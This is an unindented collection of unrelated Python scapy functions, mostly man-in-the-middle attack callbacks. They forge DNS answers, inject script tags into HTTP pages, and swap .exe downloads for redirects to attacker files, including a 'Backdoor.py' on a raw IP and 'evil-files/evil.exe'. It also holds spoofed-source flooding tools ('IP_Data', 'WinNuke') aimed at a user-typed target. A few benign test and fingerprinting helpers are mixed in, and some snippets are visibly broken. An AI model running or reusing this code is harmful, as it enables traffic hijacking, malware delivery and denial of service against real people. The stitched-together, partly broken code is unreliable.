def _defaultCallback(self, raw):
packet = net.IP(raw.get_payload())
if net.DNS in packet or net.ICMP in packet: #ignore there as they're not used for "actual" game netcode
raw.accept()
return
remote_ip = self._getRemoteIPAddress(packet)
if remote_ip and remote_ip.startswith("52.40.62."): #SONY/Amazon
raw.accept()
return
if remote_ip and ipaddress.ip_address(remote_ip).is_global:
if remote_ip in ip_catalogue:
if (kill_all and not ip_catalogue[remote_ip].protect
) or ip_catalogue[remote_ip].kill:
raw.drop()
ip_catalogue[remote_ip].heartbeat()
return
raw.accept()
if ip_catalogue[remote_ip].ip_info:
ip_catalogue[remote_ip].heartbeat()
else: #not found
ip_catalogue[remote_ip].updateIpinfo()
elif no_more != 0 and time.time() > no_more:
raw.drop()
else:
raw.accept()
ip_catalogue[remote_ip] = IP(remote_ip)
return
raw.accept()
def detail_pkt(packet):
scapy_pkt = scapy.IP(packet.get_payload())
if scapy_pkt.haslayer(scapy.DNSRR):
qname = scapy_pkt[scapy.DNSQR].qname
if b'www.vk.com' in qname:
print('inject fake vk.com')
ans = scapy.DNSRR(rrname=qname, rdata='66.203.127.18')
scapy_pkt[scapy.DNS].an = ans
scapy_pkt[scapy.DNS].ancount = 1
del scapy_pkt[scapy.IP].len
del scapy_pkt[scapy.IP].chksum
del scapy_pkt[scapy.UDP].len
del scapy_pkt[scapy.UDP].chksum
packet.set_payload(bytes(scapy_pkt))
if b'vk.com' in qname:
print('inject fake vk.com')
ans = scapy.DNSRR(rrname=qname, rdata='66.203.127.18')
scapy_pkt[scapy.DNS].an = ans
scapy_pkt[scapy.DNS].ancount = 1
del scapy_pkt[scapy.IP].len
del scapy_pkt[scapy.IP].chksum
del scapy_pkt[scapy.UDP].len
del scapy_pkt[scapy.UDP].chksum
packet.set_payload(bytes(scapy_pkt))
#print(scapy_pkt.show())
#packet.drop()
packet.accept()
def process(packet):
sp_packet = sp.IP(packet.get_payload())
if sp_packet.haslayer(sp.Raw):
if sp_packet.haslayer(sp.TCP):
load = sp_packet[sp.Raw].load
if sp_packet[sp.TCP].dport == 10000:
print("[+] HTTP request : ")
load = sp_packet[sp.Raw].load.decode("unicode-escape")
mod_load = re.sub(r'Accept-Encoding:.*', "", load)
mod_load = mod_load.replace("\n\n", "\n")
# To make sure the packet isn't segmented
mod_load = mod_load.replace("HTTP/1.1", "HTTP/1.0")
mod_load = bytes(mod_load, "utf-8")
sp_packet = modify_load(sp_packet, mod_load)
#print(sp_packet.show())
packet.set_payload(bytes(sp_packet))
elif sp_packet[sp.TCP].sport == 10000:
injection = '<script>alert("fool");\r\n</script>'
print("[+] HTTP response")
load = sp_packet[sp.Raw].load.decode("utf-8",
"backslashreplace")
load = load.replace("</body>", injection + "</body>")
content_length_search = re.search(
r"(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection)
load = load.replace(content_length,
str(new_content_length))
sp_packet = modify_load(sp_packet, load)
packet.set_payload(bytes(sp_packet))
print(sp_packet.show())
'''
if load != sp_packet[sp.Raw].load:
sp_packet = modify_load(sp_packet, load)
packet.set_payload(bytes(sp_packet))
'''
packet.accept()
def gen_pkt_to_switch(
test, # something that inherits from FbossBaseSystemTest
src_eth="00:11:22:33:44:55",
dst_eth=None, # fill in from switch
src_ip=None, # fill in based on v6=True
dst_ip=None, # fill in with switch's inband interface
src_port=12345,
dst_port=54321):
# are we using v6? Assume yes until told otherwise
v6 = True if dst_ip is None else is_v6(dst_ip)
if src_ip is None:
src_ip = 'fe80:1:2:3:4::1' if v6 else '1.2.3.4'
else:
v6 = is_v6(src_ip)
if dst_ip is None or dst_eth is None:
with test.test_topology.switch_thrift() as client:
interfaces = client.getAllInterfaces()
test.assertGreater(len(interfaces), 0, "No interfaces found!?")
if DOWNLINK_VLAN in interfaces:
interface = interfaces[DOWNLINK_VLAN]
else:
# grab an interface, doesn't matter which one because
# they all share the same MAC (currently)
interface = next(iter(interfaces.values()))
if dst_eth is None:
dst_eth = interface.mac
if dst_ip is None:
dst_ip = _get_first_router_ip(test, interface, v6)
frame = scapy.Ether(src=src_eth, dst=dst_eth)
if v6 or ':' in dst_ip:
pkt = scapy.IPv6(src=src_ip, dst=dst_ip)
else:
pkt = scapy.IP(src=src_ip, dst=dst_ip)
segment = scapy.TCP(sport=src_port, dport=dst_port)
pkt = frame / pkt / segment
test.log.info("Creating packet %s" % repr(pkt))
return bytes(pkt) # return raw packet in bytes
def handle_packet(packet):
ip = packet.getlayer(scapy.IP)
udp = packet.getlayer(scapy.UDP)
dns = packet.getlayer(scapy.DNS)
# standard (a record) dns query
if dns.qr == 0 and dns.opcode == 0:
queried_host = dns.qd.qname[:-1].decode()
resolved_ip = None
if dns_map.get(queried_host):
resolved_ip = dns_map.get(queried_host)
elif dns_map.get('*'):
resolved_ip = dns_map.get('*')
if resolved_ip:
dns_answer = scapy.DNSRR(rrname=queried_host + ".",
ttl=330,
type="A",
rclass="IN",
rdata=resolved_ip)
dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \
scapy.UDP(sport=udp.dport,
dport=udp.sport) / \
scapy.DNS(
id = dns.id,
qr = 1,
aa = 0,
rcode = 0,
qd = dns.qd,
an = dns_answer
)
print("Send %s has %s to %s" % (queried_host,
resolved_ip,
ip.src))
scapy.send(dns_reply, iface=dev)
def process_packets(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy.Raw in scapy_packet and scapy.TCP in scapy_packet:
if scapy_packet[scapy.TCP].dport == 80:
# print("HTTP Request")
if ".exe" in scapy_packet[scapy.Raw].load:
#and "192.168.43.128" not in scapy_packet[scapy.Raw].load
ack_list.append(scapy_packet[scapy.TCP].ack)
print("[+] exe Request")
elif scapy_packet[scapy.TCP].sport == 80:
# print("HTTP Response")
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("[+] Replacing file")
# print(scapy_packet.show())
modified_packet = set_load(
scapy_packet,
"\nHTTP/1.1 301 Moved Permanently\nLocation: " +
options.address + "\n\n")
packet.set_payload(str(modified_packet))
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
print("[+] Request")
print(scapy_packet.show())
new_load = re.sub("Accept-Encoding.*?\\r\\n", "",
scapy_packet[scapy.Raw].load)
replace_load(scapy_packet, new_load)
packet.set_payload(str(scapy_packet))
packet.accept()
elif scapy_packet[scapy.TCP].sport == 80:
print("[+] Response")
print(scapy_packet.show())
packet.set_payload(str(scapy_packet))
packet.accept()
else:
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if ".exe" in scapy_packet[scapy.Raw].load and "server ip" not in scapy_packet[scapy.Raw].load:
print("[+] Exe Request: ")
ack_list.append(scapy_packet[scapy.TCP].ack)
print(scapy_packet.show())
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("[+] Replacing file: ")
modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://sourceforge.net/projects/metasploitable/files/latest/download\n\n")
packet.set_payload(str(modified_packet))
#print(scapy_packet.show())
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
load = scapy_packet[scapy.Raw].load
if scapy_packet[scapy.TCP].dport == 80: # Request
print("[+] Request")
load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
load = load.replace("HTTP/1.1", "HTTP/1.0")
elif scapy_packet[scapy.TCP].sport == 80: # Response
print("[+] Response")
injection_code = '<script>alert("test");</script>'
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load(scapy_packet, load)
packet.set_payload(str(new_packet))
packet.accept()
def IP_Data():
clear = os.system('clear')
src_ip = scapy.RandIP()
print("**************************************")
print(" IP_Data Attack")
print("**************************************")
print("Please input your target's IP")
target = input("[IP_Data Attack]#")
num = 0
try:
while True:
packet = scapy.IP(
src=src_ip, dst=target, flags="DF", frag=100,
ttl=255) / scapy.UDP(dport=5060) / ("X" * 600)
#packet2 = scapy.IP(src=src_ip,dst=target,flags="MF",frag=0,ttl=255)/scapy.UDP(dport=5060)/("X"*600)
scapy.send(packet, verbose=False)
#scapy.send(packet2,verbose=False)
num += 1
print("[+]Sent " + str(num) + "packets")
except KeyboardInterrupt:
print("[-]Ctrl + C detected.....")
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
# does it have a raw (data) layer?
if scapy_packet.haslayer(scapy.Raw):
# is it http ?
if scapy_packet[scapy.TCP].dport ==80:
# does it have our target extension ?
if extension in scapy_packet[scapy.Raw].load and url not in scapy_packet[scapy.Raw].load:
# requesting a file that matches our target
print("[+] HTTP Request for :" + extension)
print("\033[1;31;47m[+] Found extension: " + extension + "\x1b[0m")
# add the ack to our ack_list so we know which response is the one to spoof
ack_list.append(scapy_packet[scapy.TCP].ack)
# it is the response!
elif scapy_packet[scapy.TCP].sport == 80:
# if it is in our ack list then replace the file with our malicious one
if scapy_packet[scapy.TCP].seq in ack_list:
print("[+] HTTP Response")
print("[+] Sending replacement file: " + url)
ack_list.remove(scapy_packet[scapy.TCP].seq)
modified_packet = set_load(scapy_packet,url)
packet.set_payload(str(modified_packet))
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(
packet.get_payload()) #convert packet to scapy packet
if scapy_packet.haslayer(scapy.Raw): #Raw layer contain the http data
if scapy_packet[scapy.TCP].dport == 10000:
if ".exe" in scapy_packet[
scapy.Raw].load and "wrar571.exe" not in scapy_packet[
scapy.Raw].load:
print("[+] exe Request")
ack_list.append(scapy_packet[scapy.TCP].ack)
#print(scapy_packet.show())
elif scapy_packet[scapy.TCP].sport == 10000:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("[+] Replacing file")
#print(scapy_packet.show())
modified_packet = set_load(
scapy_packet,
"HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/wrar571.exe\n\n"
) #rarlab download link, just for test
packet.set_payload(str(modified_packet))
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 10000:
if ".exe" in scapy_packet[
scapy.Raw].load and "rarlab" not in scapy_packet[
scapy.Raw].load:
print("[+] EXE request")
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 10000:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("[+] Replacing file")
scapy_packet[
scapy.
Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: http://93.31.82.227:8888/Python/Backdoor.py\n\n" #Put the address you want
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.TCP].chksum
packet.set_payload(str(scapy_packet))
packet.accept()
def process_packets(self, packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
load = scapy_packet[scapy.Raw].load
if scapy_packet[scapy.TCP].dport == 80:
print('{}[+] HTTP Request {}'.format(self.RED, self.RESET))
load = re.sub('Accept-Encoding:.*?\\r\\n', '', load)
elif scapy_packet[scapy.TCP].sport == 80:
print('{}[+] HTTP Response {}'.format(self.GREEN, self.RESET))
injection_code = "<script>alert('Test');</script>"
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1) # holds integer value
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = self.get_load(scapy_packet, load)
packet.set_payload(str(new_packet)) # convert back to original packe8
packet.accept()
def inner(packet):
scapy_packet = scapy.IP(packet.get_payload()) # convert to scapy packet
if scapy_packet.haslayer(scapy.Raw):
path_search = re.search("(?:://)(.*?)(?:/)", load)
path = path_search.group(1)
if scapy_packet[scapy.TCP].dport == int(port) and path not in scapy_packet[scapy.Raw].load:
# HTTP request
if str(file_ext) in scapy_packet[scapy.Raw].load:
print("[+] File request")
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == int(port):
# HTTP response
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("[+] Replacing file")
packet_load = "HTTP/1.1 301 Moved Permanently\nLocation: " + load + "\n\n"
modified_packet = set_load(scapy_packet, packet_load)
packet.set_payload(str(modified_packet))
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR): ###Looks for DNSRR (DNS response)
qname = scapy_packet[scapy.DNSQR].qname ### Sets the qname variable to url victim is requesting
#Checks to see if url spoofing target is in any DNS packets intercepted
if sys.argv[1] in qname:
print("\r[!]Victim has accessed " + sys.argv[1] + " redirecting to " + sys.argv[2]),
sys.stdout.flush()
answer = scapy.DNSRR(rrname=qname, rdata=sys.argv[2]) ###Makes a new DNS answer with url and target IP
scapy_packet[scapy.DNS].an = answer ###sets the packets an field to our supplied data
scapy_packet[scapy.DNS].ancount = 1 ### sets the packets answer number filed to 1 to avoid detection of modified packet
del scapy_packet[scapy.IP].len ####Deletes fields that will corrupt packet so scapy can recalulate
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
packet.set_payload(str(scapy_packet)) ###Takes everything we did above and converts it back into a packer for queue
packet.accept() ###forwards the modified packet!
def process_packet(pkt):
scapy_pkt = scapy.IP(pkt.get_payload())
if scapy_pkt.haslayer(scapy.Raw) and scapy_pkt.haslayer(scapy.TCP):
if scapy_pkt[scapy.TCP].dport == 80 or scapy_pkt[
scapy.TCP].dport == 10000:
if extension in str(
scapy_pkt[scapy.Raw].load) and replace_link not in str(
scapy_pkt[scapy.Raw].load):
print("[+] {} request".format(extension))
ack_list.append(scapy_pkt[scapy.TCP].ack)
elif scapy_pkt[scapy.TCP].sport == 80 or scapy_pkt[
scapy.TCP].sport == 10000:
if scapy_pkt[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_pkt[scapy.TCP].seq)
print("[+] Replacing file")
scapy_pkt[scapy.Raw].load = \
"HTTP/1.1 301 Moved Permanently" \
"\nLocation: {}\n\n".format(replace_link)
del scapy_pkt[scapy.IP].len
del scapy_pkt[scapy.IP].chksum
del scapy_pkt[scapy.TCP].chksum
pkt.set_payload(bytes(scapy_pkt))
pkt.accept()
def p0f(packet):
"""
Passively fingerprint a Scapy/pydivert packet to calculate the most
probable operating system of the packet source, based on various fields.
Args:
packet (scapy.Packet or pydivert.Packet): TCP/IP packet
Returns:
str: Matched OS
"""
if isinstance(packet, pydivert.Packet):
packet = scapy.IP(packet.ipv4.raw.tobytes())
s = packet2sig(packet)
for db_entry in db:
b = db_entry[0]
if ((s[6] == b[6]) and (s[0] == b[0] or b[0] == "*") and (s[1] == b[1])
and (s[2] == b[2]) and (s[3] == b[3] or b[3] == "*")
and (s[4] == b[4] or "*" in b[4])
and (s[5] == b[5]) and (s[7] == b[7]) and (s[8] == b[8])):
return db_entry[1]
return "Unknown OS"
def process_packet(packet):
ip_packet = scapy.IP(packet.get_payload())
if ip_packet.haslayer(scapy.Raw):
load = ip_packet[scapy.Raw].load
if ip_packet[scapy.TCP].dport == 80:
print("[+] HTTP Request")
load = re.sub(r"Accept-Encoding:.*?\r\n", "", load)
elif ip_packet[scapy.TCP].sport == 80:
print("[+] HTTP Response")
injeckt = "<script>alert(1);</script>"
load = load.replace("</body>", "</body>")
content_length_search = re.search(r"(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injeckt)
load = load.replace(content_length, str(new_content_length))
if load != ip_packet[scapy.Raw].load:
new_packet = set_load(packet, load)
packet.set_payload(new_packet)
packet.accept()
def gwscan_icmp(self, net, ip):
log.msg('gwscan for net %s, searching gw for %s' % (net, ip))
lt = self.getmacs(net)
#ans,unans = scapy.srp(scapy.Ether(dst='ff:ff:ff:ff:ff:ff') / scapy.IP(dst=ip) / scapy.ICMP(), timeout=5)
pkt = scapy.Ether(dst=lt['mac_ip'].keys())
pkt /= scapy.IP(dst=ip)
pkt /= scapy.ICMP()
ans, unans = scapy.srp(pkt, timeout=5)
ret = []
for b in ans:
for a in b[1]:
if a[scapy.ICMP].type == 0 and a[scapy.ICMP].code == 0:
mac = a[scapy.Ether].src
r_ip = a[scapy.IP].src
ip = lt['mac_ip'][mac]
ret.append({
'ttype': 'ping',
'gw_mac': mac,
'gw_ip': ip,
'r_ip': r_ip
})
log.msg('gwscan finished')
return ret
def generate(self, ip_dst=None, eth_dst=None):
"""Generates a Ping4 packet (i.e., Echo Request)
Args:
ip_dst: IP destination address (Optional)
eth_dst: Ethernet (layer 2) destination address (Optional)
"""
# Overwrite standard fields if desired
sta_ip = (ip_dst if ip_dst is not None else self.dst_ipv4)
sta_hw = (eth_dst if eth_dst is not None else self.dst_mac)
# Create IPv6 layer
base = scapy.IP(src=self.src_ipv4, dst=sta_ip)
echo_request = scapy.ICMP(type=PING4_TYPE)
ip4 = base / echo_request
# Create Ethernet layer
ethernet = scapy.Ether(src=self.src_mac, dst=sta_hw)
self.packet = ethernet / ip4
return self.packet
def change_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer('Raw'):
if scapy_packet[scapy.TCP].dport == 80:
if result.format in str(scapy_packet['Raw'].load):
print('HTTP REQUEST')
print(scapy_packet.show())
arr.append(scapy_packet['TCP'].ack)
if scapy_packet[scapy.TCP].sport == 80:
if scapy_packet['TCP'].seq in arr:
print('HTTP RESPONSE')
arr.clear()
form = f"HTTP/1.1 301 Moved Permanently\nLocation: http://{result.link}\n\n"
scapy_packet['Raw'].load = form
del scapy_packet['IP'].chksum
del scapy_packet['IP'].len
del scapy_packet['TCP'].chksum
packet.set_payload(bytes(scapy_packet))
print(scapy_packet.show())
packet.accept()
def inject_callback(packet):
scapy_packet = scapy.IP(packet.get_payload())
global COUNT
COUNT += 1
print "\r" + str(COUNT),
if scapy_packet.haslayer(scapy.TCP) and scapy_packet.haslayer(scapy.Raw):
load = scapy_packet[scapy.Raw].load
if scapy_packet[scapy.TCP].dport == PORT:
load = re.sub("Accept-Encoding:.*?\\r\\n", "", str(load))
load = load.replace("HTTP/1.1", "HTTP/1.0")
elif scapy_packet[scapy.TCP].sport == PORT:
injection_code = "<script>alert('Test');</script>"
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)",
load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load_data(scapy_packet, load)
packet.set_payload(str(new_packet))
packet.accept()
def WinNuke():
clear = os.system('clear')
print("**************************************")
print(" WinNuke Attack")
print("**************************************")
print("Please input your target's IP")
target = input("[WinNuke Attack]#")
num = 0
try:
while True:
packetss = scapy.IP(src=scapy.RandIP(), dst=target) / scapy.TCP(
sport=scapy.RandShort(),
dport=[139, 138, 137],
flags=0x020,
seq=1,
window=512)
scapy.send(packetss, verbose=False)
num += 1
print("Sent " + str(num) + "packets")
except KeyboardInterrupt:
print("[-] Ctrl + C detected.......")
def process_packet(packet):
scapy_packet = sc.IP(packet.get_payload())
if scapy_packet.haslayer(sc.Raw):
if scapy_packet[sc.TCP].dport == 80:
# if scapy_packet[sc.TCP].dport == 10000: # sslstrip
load = scapy_packet[sc.Raw].load
load = load.decode(errors='ignore')
if '.exe' in load and '10.0.2.13' not in load:
print(f'[+] exe Request > {load}')
ack_list.append(scapy_packet[sc.TCP].ack)
if scapy_packet[sc.TCP].sport == 80:
# if scapy_packet[sc.TCP].sport == 10000: # sslstrip
if scapy_packet[sc.TCP].seq in ack_list:
ack_list.remove(scapy_packet[sc.TCP].seq)
load = scapy_packet[sc.Raw].load
load = load.decode(errors='ignore')
print(f'[+] Replacing file > {load}')
load = 'HTTP/1.1 301 Moved Permanently\r\nLocation: http://10.0.2.13/evil-files/evil.exe\r\n\r\n'
print(f'[+] Replacing by file > {load}')
load = load.encode()
packet.set_payload(bytes(set_load(scapy_packet, load)))
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(
packet.get_payload()) #converting packet to scapy packet
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if "www.washington.edu" in qname:
#use any site that is using http
ans = scapy.DNSRR(rrname=qname, rdata="10.0.2.15")
scapy_packet[scapy.DNS].an = ans
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
packet.set_payload(str(scapy_packet))
#print(scapy_packet.show())
#generate dns req by ping -c 1 www.bing.com
#print(packet.get_payload())
#packet.drop() to drop a packet and not to pass on
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
#80 is an HTTP port
if scapy_packet[scapy.TCP].dport == 80:
#print("HTTP Request")
if ".exe" in scapy_packet[scapy.Raw].load:
print("[+] exe Request")
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 80:
#print("HTTP Response")
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print(["[+] Replacing file"])
modified_packet = set_load(
scapy_packet,
"HTTP/1.1 301 Moved Permanently\nLocation: http://www.example.org/index.asp\n\n"
)
packet.set_payload(str(modified_packet))
packet.accept()
def catch_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
# modificamos la respuesta
qname = scapy_packet[scapy.DNSQR].qname
if "www.bing.com" in qname:
print("Spoofing target")
answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.6") # rdata=mi ip
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].acount = 1
# Borramos los indices que nos podrían delatar
# los checksum y longitud de IP y UDP
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
# Guardamos el paquete con la nueva peptición
packet.set_payload(str(scapy_packet))
# fin modificacion
print(scapy_packet.show())
packet.accept()
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if ".exe" in scapy_packet[scapy.Raw].load:
print("[+] exe Request")
ack_list.append(scapy_packet[scapy.TCP].ack)
print(scapy_packet.show())
# print("HTTP Request")
# print(scapy_packet.show())
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("[+] Replacing file")
modified_packet = set_load(
scapy_packet,
"HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/wrar56b1.exe\n\n"
)
packet.set_payload(str(modified_packet))
# print("HTTP Response")
# print(scapy_packet.show())
packet.accept()
def process_packet(packet):
global new_download
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if ".exe" in scapy_packet[
scapy.Raw].load and new_download not in scapy_packet[
scapy.Raw].load:
print("\033[94m[+]\033[0m .exe requested!")
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 10000:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("\033[92m[+]\033[0m Replacing file")
new_packet = set_load(
scapy_packet,
"HTTP/1.1 301 Moved Permanently\nLocation: " +
new_download + "\n\n")
packet.set_payload(str(new_packet))
packet.accept()